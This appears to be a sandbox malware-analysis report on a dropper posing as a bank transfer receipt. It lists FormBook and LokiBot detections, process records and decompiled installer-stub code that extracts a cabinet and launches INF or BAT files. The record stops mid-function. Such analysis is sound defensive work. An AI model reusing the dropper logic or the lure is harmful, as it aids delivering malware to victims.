Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000016.00000002.821885746.0000000003F37000.00000004.00020000.sdmp, Author: Florian Roth
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 5168 Parent PID: 6932

General

Start time:	14:14:21
Start date:	15/12/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe"
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 4456 Parent PID: 5168

General

Start time:	14:14:22
Start date:	15/12/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe PID: 4360 Parent PID: 4884 Bank_Transfer_Receipt_Copy_Scan#342 (5).exeCOMMON

Executed Functions

Function 00F31910, Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 290
memoryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00F31910(long __ecx, CHAR** _a4, int* _a8) {
				signed int _v8;
				char _v268;
				char _v527;
				char _v528;
				char _v1552;
				CHAR* _v1556;
				CHAR** _v1560;
				int* _v1564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t48;
				CHAR* _t53;
				CHAR* _t54;
				char* _t57;
				char* _t58;
				CHAR* _t60;
				void* _t62;
				signed char _t65;
				intOrPtr _t76;
				intOrPtr _t77;
				unsigned int _t85;
				CHAR* _t90;
				CHAR* _t92;
				char _t105;
				char _t106;
				CHAR** _t111;
				CHAR* _t115;
				intOrPtr* _t123;
				void* _t124;
				CHAR* _t130;
				CHAR* _t133;
				void* _t136;
				void* _t137;
				void* _t143;
				intOrPtr* _t144;
				char* _t146;
				CHAR* _t149;
				void* _t150;
				CHAR* _t153;
				CHAR* _t154;
				void* _t155;
				signed int _t156;

				_t48 =  *0xf38000; // 0xfdaca2c3
				_v8 = _t48 ^ _t156;
				_t108 = __ecx;
				_v1560 = _a4;
				_v1564 = _a8;
				E00F31485( &_v528, 0x104, __ecx);
				_t111 =  &_v1556;
				if(_v528 != 0x22) {
					_t53 =  &_v528;
					_t133 = " ";
				} else {
					_t53 =  &_v527;
					_t133 = "\"";
				}
				_v1556 = _t53;
				_t54 = E00F318A7(_t111, _t133);
				_t154 = _v1556;
				_t149 = _t54;
				if(_t154 == 0) {
					L12:
					_push(_t111);
					E00F3158C( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
					E00F364E7( &_v268, 0x104, _t154);
					goto L13;
				} else {
					_t130 = _t154;
					_t146 =  &(_t130[1]);
					do {
						_t105 =  *_t130;
						_t130 =  &(_t130[1]);
					} while (_t105 != 0);
					_t111 = _t130 - _t146;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t154[1];
					if(_t106 != 0x3a || _t154[2] != 0x5c) {
						if( *_t154 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E00F31485( &_v268, 0x104, _t154);
						L13:
						_t136 = 0x2e;
						_t57 = E00F365AF(_t154, _t136);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t137 = 0x2e;
							_t115 = _t154;
							_t58 = E00F365AF(_t115, _t137);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t154 = LocalAlloc(0x40, 0x400);
								if(_t154 == 0) {
									goto L22;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									_t119 =  &_v1552;
									E00F31485( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									_t119 =  &_v1552;
									E00F3158C( &_v1552, 0x400, _t115,  &_v268);
									if(_t149 != 0 &&  *_t149 != 0) {
										E00F314BD( &_v1552, 0x400, _t149, " ");
										_t119 =  &_v1552;
										E00F314BD( &_v1552, 0x400, _t149, _t149);
									}
								}
								_t138 = _t154;
								E00F32922( &_v1552, _t154, _t119);
							} else {
								_t108 = "Command.com /c %s";
								_t123 = "Command.com /c %s";
								_t143 = _t123 + 1;
								do {
									_t76 =  *_t123;
									_t123 = _t123 + 1;
								} while (_t76 != 0);
								_t124 = _t123 - _t143;
								_t144 =  &_v268;
								_t155 = _t144 + 1;
								do {
									_t77 =  *_t144;
									_t144 = _t144 + 1;
								} while (_t77 != 0);
								_t138 = _t144 - _t155;
								_t152 = _t124 + 8 + _t144 - _t155;
								_t154 = LocalAlloc(0x40, _t124 + 8 + _t144 - _t155);
								if(_t154 == 0) {
									goto L22;
								}
								E00F31524(_t154, _t152, "Command.com /c %s",  &_v268);
							}
							goto L53;
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t138 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L36;
							} else {
								_t138 = "[";
								_v1556 = _t149;
								_t90 = E00F318A7( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t138 = "]";
									E00F318A7( &_v1556, "]");
								}
								_t154 = LocalAlloc(0x40, 0x200);
								if(_t154 != 0) {
									_t153 = _v1556;
									_t92 = _t153;
									if( *_t153 == 0) {
										_t92 = "DefaultInstall";
									}
									 *0xf39a84 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
									 *_v1564 = 1;
									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xf31111, _t154, 8,  &_v268) == 0) {
										 *0xf39a74 =  *0xf39a74 & 0xfffffffb;
										if( *0xf39a80 != 0) {
											_t108 = "setupapi.dll";
										} else {
											_t108 = "setupx.dll";
											GetShortPathNameA( &_v268,  &_v268, 0x104);
										}
										if( *_t153 == 0) {
											_t153 = "DefaultInstall";
										}
										_push( &_v268);
										_push(_t153);
										E00F31524(_t154, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
									} else {
										 *0xf39a74 =  *0xf39a74 | 0x00000004;
										if( *_t153 == 0) {
											_t153 = "DefaultInstall";
										}
										E00F31485(_t108, 0x104, _t153);
										_t138 = 0x200;
										E00F31485(_t154, 0x200,  &_v268);
									}
									L53:
									_t62 = 1;
									 *_v1560 = _t154;
									goto L54;
								} else {
									L22:
									_t60 = 0;
									_t138 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L36:
									_push(_t60);
									E00F34327(0, _t138);
									_t62 = 0;
									L54:
									_pop(_t150);
									return E00F36C20(_t62, _t108, _v8 ^ _t156, _t138, _t150, _t154);
								}
							}
						}
					}
				}
			}

0x00f3191b
0x00f31922
0x00f3192f
0x00f31931
0x00f31942
0x00f31948
0x00f31954
0x00f3195a
0x00f31969
0x00f3196f
0x00f3195c
0x00f3195c
0x00f31962
0x00f31962
0x00f31974
0x00f3197a
0x00f3197f
0x00f31985
0x00f31989
0x00f319c7
0x00f319c7
0x00f319d9
0x00f319ea
0x00000000
0x00f3198b
0x00f3198b
0x00f3198d
0x00f31990
0x00f31990
0x00f31992
0x00f31993
0x00f31997
0x00f3199c
0x00000000
0x00000000
0x00f3199e
0x00f319a3
0x00f319ae
0x00000000
0x00000000
0x00000000
0x00000000
0x00f319b4
0x00f319b4
0x00f319c0
0x00f319ef
0x00f319f1
0x00f319f4
0x00f319fb
0x00f31ba7
0x00f31ba8
0x00f31baa
0x00f31bb1
0x00f31c2c
0x00f31c30
0x00000000
0x00000000
0x00f31c3d
0x00f31c46
0x00f31c98
0x00f31c9e
0x00f31c4c
0x00f31c4c
0x00f31c53
0x00f31c5c
0x00f31c62
0x00f31c69
0x00f31c7d
0x00f31c85
0x00f31c8b
0x00f31c8b
0x00f31c69
0x00f31ca4
0x00f31cac
0x00f31bcb
0x00f31bcb
0x00f31bd0
0x00f31bd2
0x00f31bd5
0x00f31bd5
0x00f31bd7
0x00f31bd8
0x00f31bdc
0x00f31bde
0x00f31be4
0x00f31be7
0x00f31be7
0x00f31be9
0x00f31bea
0x00f31bee
0x00f31bf3
0x00f31bfe
0x00f31c02
0x00000000
0x00000000
0x00f31c12
0x00f31c17
0x00000000
0x00f31a1d
0x00f31a24
0x00f31a2d
0x00f31b87
0x00f31b8c
0x00f31b8d
0x00f31b8f
0x00f31b90
0x00000000
0x00f31a41
0x00f31a41
0x00f31a46
0x00f31a52
0x00f31a59
0x00f31a5e
0x00f31a60
0x00f31a60
0x00f31a66
0x00f31a71
0x00f31a71
0x00f31a83
0x00f31a87
0x00f31a99
0x00f31a9f
0x00f31aa4
0x00f31aa6
0x00f31aa6
0x00f31ac0
0x00f31acb
0x00f31af2
0x00f31b2a
0x00f31b39
0x00f31b55
0x00f31b3b
0x00f31b46
0x00f31b4d
0x00f31b4d
0x00f31b5d
0x00f31b5f
0x00f31b5f
0x00f31b6a
0x00f31b6b
0x00f31b78
0x00f31af4
0x00f31af4
0x00f31afe
0x00f31b00
0x00f31b00
0x00f31b0d
0x00f31b18
0x00f31b20
0x00f31b20
0x00f31cb1
0x00f31cb9
0x00f31cba
0x00000000
0x00f31a89
0x00f31a89
0x00f31a89
0x00f31a8b
0x00f31a90
0x00f31a91
0x00f31a93
0x00f31b96
0x00f31b96
0x00f31b99
0x00f31b9e
0x00f31cbc
0x00f31cbf
0x00f31ccc
0x00f31ccc
0x00f31a87
0x00f31a2d
0x00f319fb
0x00f319a3

APIs

CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00F31A0F
GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00F31A24
LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00F31A7D
GetPrivateProfileIntA.KERNEL32 ref: 00F31ABA
GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00F31111,00000000,00000008,?), ref: 00F31AEA
GetShortPathNameA.KERNEL32 ref: 00F31B4D
CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.BAT,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00F31BC1
LocalAlloc.KERNEL32(00000040,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00F31BF8
LocalAlloc.KERNEL32(00000040,00000400,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00F31C26
GetFileAttributesA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00F31C3D

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00F319C8
.BAT, xrefs: 00F31BB5
Command.com /c %s, xrefs: 00F31BCB, 00F31C0F
setupapi.dll, xrefs: 00F31B55, 00F31B6C
", xrefs: 00F3194D
rundll32.exe %s,InstallHinfSection %s 128 %s, xrefs: 00F31B6D
DefaultInstall, xrefs: 00F31AA6, 00F31AB9, 00F31B00, 00F31B05, 00F31B5F, 00F31B6B
Version, xrefs: 00F31AE5
.INF, xrefs: 00F31A03
AdvancedINF, xrefs: 00F31AE0
Reboot, xrefs: 00F31AB4
setupx.dll, xrefs: 00F31B46

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocLocalString$AttributesCompareFilePrivateProfile$NamePathShort
String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
API String ID: 272226175-3368923722
Opcode ID: 2a4aaca8c32be7386336064a5ee453610579ae464bc673f0a85b4d710a11cacb
Instruction ID: 7393d2a221a5ec85396b52da21ab3e4f95bf49e9f8bcf45aa09208709000f90c
Opcode Fuzzy Hash: 2a4aaca8c32be7386336064a5ee453610579ae464bc673f0a85b4d710a11cacb
Instruction Fuzzy Hash: 1FA12AB1E042186BEF249B24CC45BEA776AFB81330F144294E595E32C1EBB49E85EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00F34E80, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 121
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00F34E80(void* __edi) {
				void* __ebx;
				void* _t8;
				struct HWND__* _t9;
				int _t10;
				void* _t12;
				struct HWND__* _t24;
				struct HWND__* _t27;
				intOrPtr _t29;
				void* _t33;
				int _t34;
				CHAR* _t36;
				int _t37;
				intOrPtr _t46;

				_t33 = __edi;
				_t36 = "CABINET";
				 *0xf39184 = E00F34538(_t36, 0, 0);
				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
				 *0xf39180 = _t8;
				if(_t8 == 0) {
					return _t8;
				}
				_t9 =  *0xf385c0; // 0x0
				if(_t9 != 0) {
					ShowWindow(GetDlgItem(_t9, 0x842), 0);
					ShowWindow(GetDlgItem( *0xf385c0, 0x841), 5);
				}
				_t10 = E00F34DA8(0, 0);
				if(_t10 != 0) {
					__imp__#20(E00F34BA0, E00F34BC0, E00F34860, E00F34940, E00F349C0, E00F34A60, E00F34AC0, 1, 0xf39188, _t33);
					_t34 = _t10;
					if(_t34 == 0) {
						L8:
						_t29 =  *0xf39188; // 0x0
						_t24 =  *0xf385c0; // 0x0
						E00F34327(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
						_t37 = 0;
						L9:
						goto L10;
					}
					__imp__#22(_t34, "*MEMCAB", 0xf31111, 0, E00F34BE0, 0, 0xf39180); // executed
					_t37 = _t10;
					if(_t37 == 0) {
						goto L9;
					}
					__imp__#23(_t34); // executed
					if(_t10 != 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t27 =  *0xf385c0; // 0x0
					E00F34327(_t27, 0x4ba, 0, 0, 0x10, 0);
					_t37 = 0;
					L10:
					_t12 =  *0xf39180; // 0x0
					if(_t12 != 0) {
						FreeResource(_t12);
						 *0xf39180 = 0;
					}
					if(_t37 == 0) {
						_t46 =  *0xf39218; // 0x0
						if(_t46 == 0) {
							E00F34327(0, 0x4f8, 0, 0, 0x10, 0);
						}
					}
					if(( *0xf38958 & 0x00000001) == 0 && ( *0xf39a74 & 0x00000001) == 0) {
						SendMessageA( *0xf385c0, 0xfa1, _t37, 0);
					}
					return _t37;
				}
			}

0x00f34e80
0x00f34e86
0x00f34e99
0x00f34ead
0x00f34eb3
0x00f34eba
0x00f35003
0x00f35003
0x00f34ec0
0x00f34ec7
0x00f34ed7
0x00f34ef1
0x00f34ef1
0x00f34ef7
0x00f34efe
0x00f34f47
0x00f34f4d
0x00f34f54
0x00f34f88
0x00f34f88
0x00f34f8e
0x00f34f9f
0x00f34fa4
0x00f34fa6
0x00000000
0x00f34fa6
0x00f34f6d
0x00f34f73
0x00f34f7a
0x00000000
0x00000000
0x00f34f7d
0x00f34f86
0x00000000
0x00000000
0x00000000
0x00f34f00
0x00f34f00
0x00f34f10
0x00f34f15
0x00f34fa7
0x00f34fa7
0x00f34fae
0x00f34fb1
0x00f34fb7
0x00f34fb7
0x00f34fbf
0x00f34fc1
0x00f34fc7
0x00f34fd5
0x00f34fd5
0x00f34fc7
0x00f34fe1
0x00f34ff9
0x00f34ff9
0x00000000
0x00f34fff

APIs

Part of subcall function 00F34538: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F34549
Part of subcall function 00F34538: SizeofResource.KERNEL32(00000000,00000000,?,00F32BA8,0000007F,?,?,?,?,?,?,00000000,00000001,00000000), ref: 00F34552

FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00F34E9E
LoadResource.KERNEL32(00000000,00000000), ref: 00F34EA6
LockResource.KERNEL32(00000000), ref: 00F34EAD
GetDlgItem.USER32 ref: 00F34ED0
ShowWindow.USER32(00000000), ref: 00F34ED7
GetDlgItem.USER32 ref: 00F34EEA
ShowWindow.USER32(00000000), ref: 00F34EF1
#20.CABINET(00F34BA0,00F34BC0,Function_00004860,00F34940,00F349C0,Function_00004A60,00F34AC0,00000001,00F39188,00000000), ref: 00F34F47
#22.CABINET(00000000,*MEMCAB,00F31111,00000000,00F34BE0,00000000,00F39180), ref: 00F34F6D
#23.CABINET(00000000), ref: 00F34F7D
FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00F34FB1
SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00F34FF9

Strings

CABINET, xrefs: 00F34E86, 00F34E97
*MEMCAB, xrefs: 00F34F67

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$FindItemShowWindow$FreeLoadLockMessageSendSizeof
String ID: *MEMCAB$CABINET
API String ID: 2850049833-2642027498
Opcode ID: ab3b4be931d01be6acd04378b6deb3c9f2a64cbec1ca46c52f9781a7ebba4b20
Instruction ID: a9406ede7ebc7d6aaa1c4763bb4b2991f9d785a2d45bbbdc42f1b1706575250d
Opcode Fuzzy Hash: ab3b4be931d01be6acd04378b6deb3c9f2a64cbec1ca46c52f9781a7ebba4b20
Instruction Fuzzy Hash: B531B3B1A4430A7BE7106B71EC89F67366EB744B75F080124B941A31A1DBF8FC41BA62

Uniqueness

Uniqueness Score: -1.00%

Function 00F35849, Relevance: 19.7, APIs: 13, Instructions: 211
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00F35849(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
				signed int _v8;
				char _v16;
				void _v527;
				char _v528;
				char _v788;
				long _v792;
				signed int _v796;
				long _v800;
				long _v804;
				long _v808;
				long _v812;
				long _v816;
				void* __ebx;
				void* __esi;
				signed int _t50;
				int _t54;
				signed int _t59;
				void* _t70;
				signed int _t72;
				signed int _t75;
				signed short _t80;
				signed int _t83;
				signed int _t89;
				signed int _t103;
				long _t104;
				unsigned int _t105;
				unsigned int _t107;
				signed int _t113;
				void* _t114;
				int _t118;
				CHAR* _t119;
				signed int _t120;

				_t116 = __edi;
				_t50 =  *0xf38000; // 0xfdaca2c3
				_v8 = _t50 ^ _t120;
				_v796 = __edx;
				_t119 = __ecx;
				GetCurrentDirectoryA(0x104,  &_v788);
				_t54 = SetCurrentDirectoryA(_t119); // executed
				if(_t54 != 0) {
					_push(__edi);
					_v800 = 0;
					_v792 = 0;
					_v804 = 0;
					_v808 = 0;
					_t59 = GetDiskFreeSpaceA(0,  &_v800,  &_v792,  &_v804,  &_v808); // executed
					__eflags = _t59;
					if(_t59 == 0) {
						L30:
						_v528 = 0;
						memset( &_v527, 0, 0x1ff);
						 *0xf39a88 = E00F3613C();
						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v528, 0x200, 0);
						_t112 = 0x4b0;
						L31:
						__eflags = 0;
						E00F34327(0, _t112, _t119,  &_v528, 0x10, 0);
						SetCurrentDirectoryA( &_v788);
						L32:
						_t70 = 0;
						__eflags = 0;
						L33:
						_pop(_t116);
						goto L34;
					}
					_t118 = _v792 * _v800;
					_t72 = MulDiv(_t118, _v804, 0x400);
					_v792 = _t72;
					__eflags = _t72;
					if(_t72 == 0) {
						goto L30;
					}
					_t75 = GetVolumeInformationA(0, 0, 0, 0,  &_v816,  &_v812, 0, 0); // executed
					__eflags = _t75;
					if(_t75 != 0) {
						SetCurrentDirectoryA( &_v788); // executed
						_t103 =  &_v16;
						_t113 = 6;
						_t119 = _t119 - _t103;
						__eflags = _t119;
						while(1) {
							_t23 = _t113 - 4; // 0x2
							__eflags = _t23;
							if(_t23 == 0) {
								break;
							}
							_t89 = _t119[_t103];
							__eflags = _t89;
							if(_t89 == 0) {
								break;
							}
							 *_t103 = _t89;
							_t103 = _t103 + 1;
							_t113 = _t113 - 1;
							__eflags = _t113;
							if(_t113 != 0) {
								continue;
							}
							break;
						}
						__eflags = _t113;
						if(_t113 == 0) {
							_t103 = _t103 - 1;
							__eflags = _t103;
						}
						 *_t103 = 0;
						_t80 = 0;
						_t104 = 0x200;
						_t114 = 8;
						while(1) {
							__eflags = _t118 - _t104;
							if(_t118 == _t104) {
								break;
							}
							_t104 = _t104 + _t104;
							_t80 = _t80 + 1;
							__eflags = _t80 - _t114;
							if(_t80 < _t114) {
								continue;
							}
							break;
						}
						__eflags = _t80 - _t114;
						if(_t80 != _t114) {
							__eflags =  *0xf39a74 & 0x00000008;
							if(( *0xf39a74 & 0x00000008) == 0) {
								L20:
								_t105 =  *0xf39a78; // 0x0
								_t112 =  *((intOrPtr*)(0xf38900 + (_t80 & 0x0000ffff) * 4));
								L21:
								_t83 = _v796 & 0x00000001;
								__eflags = _t83;
								if(_t83 == 0) {
									L24:
									__eflags = _t83;
									if(_t83 == 0) {
										__eflags = _t105 - _v792;
									} else {
										__eflags = _t112 - _v792;
									}
									L27:
									if(__eflags <= 0) {
										 *0xf39a88 = 0;
										_t70 = 1;
									} else {
										_t70 = E00F324EE(_a4, _t112, _t105,  &_v16);
									}
									goto L33;
								}
								__eflags = _v796 & 0x00000002;
								if((_v796 & 0x00000002) == 0) {
									goto L24;
								}
								__eflags = _t105 + _t112 - _v792;
								goto L27;
							}
							__eflags = _v812 & 0x00008000;
							if((_v812 & 0x00008000) == 0) {
								goto L20;
							}
							_t107 =  *0xf39a78; // 0x0
							_t112 =  *((intOrPtr*)(0xf38900 + (_t80 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xf38900 + (_t80 & 0x0000ffff) * 4));
							_t105 = (_t107 >> 2) +  *0xf39a78;
							goto L21;
						}
						_t112 = 0x4c5;
						E00F34327(0, 0x4c5, 0, 0, 0x10, 0);
						goto L32;
					}
					_v528 = 0;
					memset( &_v527, 0, 0x1ff);
					 *0xf39a88 = E00F3613C();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v528, 0x200, 0);
					_t112 = 0x4f9;
					goto L31;
				} else {
					_t112 = 0x4bc;
					E00F34327(0, 0x4bc, 0, 0, 0x10, 0);
					 *0xf39a88 = E00F3613C();
					_t70 = 0;
					L34:
					return E00F36C20(_t70, 0, _v8 ^ _t120, _t112, _t116, _t119);
				}
			}

0x00f35849
0x00f35854
0x00f3585b
0x00f35866
0x00f35872
0x00f35874
0x00f3587b
0x00f35885
0x00f358a9
0x00f358b0
0x00f358bd
0x00f358ca
0x00f358d7
0x00f358df
0x00f358e5
0x00f358e7
0x00f35a7a
0x00f35a85
0x00f35a8d
0x00f35a9b
0x00f35aba
0x00f35ac0
0x00f35ac5
0x00f35ace
0x00f35ad2
0x00f35ade
0x00f35ae4
0x00f35ae4
0x00f35ae4
0x00f35ae6
0x00f35ae6
0x00000000
0x00f35ae6
0x00f358f3
0x00f35906
0x00f3590c
0x00f35912
0x00f35914
0x00000000
0x00000000
0x00f3592e
0x00f35934
0x00f35936
0x00f3598f
0x00f35995
0x00f3599c
0x00f3599d
0x00f3599d
0x00f3599f
0x00f3599f
0x00f359a2
0x00f359a4
0x00000000
0x00000000
0x00f359a6
0x00f359a9
0x00f359ab
0x00000000
0x00000000
0x00f359ad
0x00f359af
0x00f359b0
0x00f359b0
0x00f359b1
0x00000000
0x00000000
0x00000000
0x00f359b1
0x00f359b3
0x00f359b5
0x00f359b7
0x00f359b7
0x00f359b7
0x00f359ba
0x00f359bc
0x00f359be
0x00f359c3
0x00f359c4
0x00f359c4
0x00f359c6
0x00000000
0x00000000
0x00f359c8
0x00f359ca
0x00f359cb
0x00f359ce
0x00000000
0x00000000
0x00000000
0x00f359ce
0x00f359d0
0x00f359d3
0x00f359eb
0x00f359f2
0x00f35a1d
0x00f35a1d
0x00f35a26
0x00f35a2d
0x00f35a33
0x00f35a33
0x00f35a36
0x00f35a4c
0x00f35a4c
0x00f35a4e
0x00f35a58
0x00f35a50
0x00f35a50
0x00f35a50
0x00f35a5e
0x00f35a5e
0x00f35a71
0x00f35a77
0x00f35a60
0x00f35a68
0x00f35a68
0x00000000
0x00f35a5e
0x00f35a38
0x00f35a3f
0x00000000
0x00000000
0x00f35a44
0x00000000
0x00f35a44
0x00f359f4
0x00f359fe
0x00000000
0x00000000
0x00f35a00
0x00f35a13
0x00f35a15
0x00000000
0x00f35a15
0x00f359da
0x00f359e1
0x00000000
0x00f359e1
0x00f35943
0x00f3594b
0x00f35959
0x00f35978
0x00f3597e
0x00000000
0x00f35887
0x00f3588c
0x00f35893
0x00f3589d
0x00f358a2
0x00f35ae7
0x00f35af6
0x00f35af6

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00F35874
SetCurrentDirectoryA.KERNELBASE(?), ref: 00F3587B
GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00F358DF
MulDiv.KERNEL32(?,?,00000400), ref: 00F35906
GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00F3592E
memset.MSVCRT ref: 00F3594B
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00F3596B
FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00F35978
SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00F35ADE

Part of subcall function 00F34327: LoadStringA.USER32 ref: 00F3438D
Part of subcall function 00F34327: MessageBoxA.USER32 ref: 00F343C9

Part of subcall function 00F3613C: GetLastError.KERNEL32(00F35A9A), ref: 00F3613C

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
String ID:
API String ID: 4237285672-0
Opcode ID: ec4c8a035aad4f3413fafb5b1bf072dddbf64f0c0985c9c79cacf9dbf3c7ff53
Instruction ID: e7f8f525d7d8eb0fd95943e327f3ba441c856a541ba8b9381d40cb8fba097966
Opcode Fuzzy Hash: ec4c8a035aad4f3413fafb5b1bf072dddbf64f0c0985c9c79cacf9dbf3c7ff53
Instruction Fuzzy Hash: 9571B3B190421CAFEB25DB20DC85FFA77BDEB48720F1041AAF446D2141DA789E81BF61

Uniqueness

Uniqueness Score: -1.00%

Function 00F32DAE, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 121
libraryfileloaderCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00F32DAE(int __edx) {
				signed int _v8;
				char _v272;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t8;
				signed int _t10;
				signed int _t11;
				signed int _t13;
				signed int _t20;
				signed int _t21;
